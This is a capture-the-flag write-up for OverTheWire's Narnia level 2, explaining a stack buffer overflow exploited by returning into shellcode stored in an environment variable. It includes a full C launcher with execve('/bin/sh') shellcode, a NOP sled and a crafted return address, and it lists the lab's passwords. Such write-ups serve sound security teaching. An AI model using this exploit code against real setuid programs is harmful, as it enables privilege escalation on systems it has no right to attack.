Level 2 Username : narnia2 Password : nairiepecu SSH : narnia.labs.overthewire.org:2226
To solve this level, we first ssh into the narnia server using the credentials provided above. Let’s have a look at the executable for this level and its source code.
As we can see, the executable copies its argument into a buffer and then prints it, without checking the argument's length. The buffer is 128 bytes. If we supply more bytes than the buffer holds, the copy runs past it and over the saved return address on the stack, so when the function returns, the instruction pointer (EIP) is loaded with a value we control. This level is very similar to the last one; the difference is that this time the executable does not run our shellcode for us. We have to place the shellcode at an address we know and make the return address point there. In this scenario, I can think of two easy ways to solve this:
- Put the shellcode in the buffer itself and jump to it after finding its address.
- Put the shellcode in an environment variable and jump to that address.
Since this level is very similar to the previous one, I decided to use an environment variable to hold the shellcode. In the previous level, the executable jumped to our shellcode in the variable by itself; this time we need to overwrite the saved return address so that the function returns into our shellcode.
Let's first determine how many bytes it takes for the input to reach the saved return address.
As we can see above, the return address is overwritten after 140 bytes. Therefore, the four bytes that follow 140 bytes of filler become the new return address; since x86 is little-endian, the address has to be written least-significant byte first.
Using the above programs (the EGG variable holding the shellcode and the findeggaddr helper that reports its address), we will now create a simple Python script that overflows the return address with the address returned by findeggaddr.
As we can see above, despite passing an address for the shellcode, the executable throws a Segmentation Fault with no core dump. The setuid binary will not dump core, so to see what was happening I made a copy of the narnia2 executable in my temp directory (the copy is not setuid and can be debugged normally) and ran it under gdb.
As we can see, the executable does return to our address, yet it still segfaults. Let's check whether our environment address is correct.
As we can see above, our address for EGG was incorrect; the correct one can be found by reading the environment of the running process inside gdb. The reason is that the location of an environment variable on the stack depends on what sits above it: the program's path and the rest of the environment. A helper such as findeggaddr therefore only reports the right address when it is run with the same environment as the target, and the value can still shift by the difference in path length between the helper and narnia2. Note also that gdb adds variables such as LINES and COLUMNS to the environment of the program it runs, so an address read in gdb can differ from a run outside gdb unless the environment is kept identical. With the correct value for the shellcode address, we can execute narnia2 to get the password for the next level.
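The payload layout described above (140 bytes of filler followed by the little-endian return address) and the address-mismatch problem just discussed, worked through in C as an added example. This is not the writeup's own script or anything from the Narnia game: the target path /narnia/narnia2, the EGG address (read from gdb and passed on the command line) and the execve("/bin/sh") shellcode are assumptions. Two things it adds over the bare overflow: the EGG value is padded with a NOP sled so that an address estimate that is off by up to a couple of hundred bytes still lands in the shellcode, and the payload is checked for NUL bytes, since strcpy would stop copying at the first one and never reach the return address.

```c
/* Added example, not code from the writeup. Builds a ret2env payload for a
 * narnia2-style overflow and launches the target with a minimal environment.
 * Assumptions (not from the page): target path /narnia/narnia2, the EGG
 * address supplied on the command line, and the shellcode bytes below. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define RET_OFFSET 140   /* bytes of filler before the saved return address */
#define NOP_SLED   256   /* tolerance for a slightly wrong EGG address */

/* Linux x86 execve("/bin/sh", NULL, NULL), 24 bytes, no NUL bytes:
 * xor eax,eax; push eax; push "//sh"; push "/bin"; mov ebx,esp;
 * push eax; push ebx; mov ecx,esp; cdq; mov al,11; int 0x80 */
static const unsigned char shellcode[] =
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
    "\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
#define SHELLCODE_LEN (sizeof(shellcode) - 1)

/* Writes "EGG=<NOP sled><shellcode>" into out, NUL-terminated.
 * Returns the length without the terminator, or 0 if out is too small. */
size_t build_egg(char *out, size_t cap)
{
    size_t need = 4 + NOP_SLED + SHELLCODE_LEN;
    if (cap < need + 1) return 0;
    memcpy(out, "EGG=", 4);
    memset(out + 4, 0x90, NOP_SLED);                 /* 0x90 = nop */
    memcpy(out + 4 + NOP_SLED, shellcode, SHELLCODE_LEN);
    out[need] = '\0';
    return need;
}

/* Writes RET_OFFSET filler bytes followed by ret_addr in little-endian order
 * (0xffffd3a0 is sent as a0 d3 ff ff), then a terminating NUL.
 * Returns the payload length (RET_OFFSET + 4), or 0 if out is too small. */
size_t build_payload(unsigned char *out, size_t cap, uint32_t ret_addr)
{
    if (cap < RET_OFFSET + 4 + 1) return 0;
    memset(out, 'A', RET_OFFSET);
    for (int i = 0; i < 4; i++)
        out[RET_OFFSET + i] = (unsigned char)(ret_addr >> (8 * i));
    out[RET_OFFSET + 4] = '\0';
    return RET_OFFSET + 4;
}

/* strcpy() stops at the first NUL, so a 0x00 anywhere in the payload would
 * truncate it before the return address. Returns 1 if the payload is safe. */
int payload_is_nul_free(const unsigned char *p, size_t len)
{
    return memchr(p, 0, len) == NULL;
}

int main(int argc, char **argv)
{
    if (argc != 2) {
        fprintf(stderr, "usage: %s <EGG address from gdb, e.g. 0xffffd3a0>\n", argv[0]);
        return 1;
    }
    /* Aim into the middle of the sled: an estimate that is off by up to
     * NOP_SLED/2 bytes in either direction still slides into the shellcode. */
    uint32_t ret = (uint32_t)strtoul(argv[1], NULL, 0) + NOP_SLED / 2;

    unsigned char payload[RET_OFFSET + 5];
    char egg[4 + NOP_SLED + SHELLCODE_LEN + 1];
    if (!build_payload(payload, sizeof payload, ret) || !build_egg(egg, sizeof egg))
        return 1;
    if (!payload_is_nul_free(payload, RET_OFFSET + 4)) {
        fprintf(stderr, "return address contains a NUL byte; strcpy would truncate it\n");
        return 1;
    }

    /* Only EGG in the environment: the fewer variables there are, the easier
     * it is to reproduce the same stack layout when reading the address in gdb. */
    char *envp[] = { egg, NULL };
    char *args[] = { "/narnia/narnia2", (char *)payload, NULL };  /* assumed path */
    execve(args[0], args, envp);
    perror("execve");
    return 1;
}
```

Because the launcher passes a fixed environment to execve, the address of EGG only depends on the target's path and is the same on every run while ASLR is off; read it once in gdb by running the copied binary with the same single-variable environment, then hand that value to the launcher.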
Level 3 Username : narnia3 Password : vaequeezee SSH : narnia.labs.overthewire.org:2226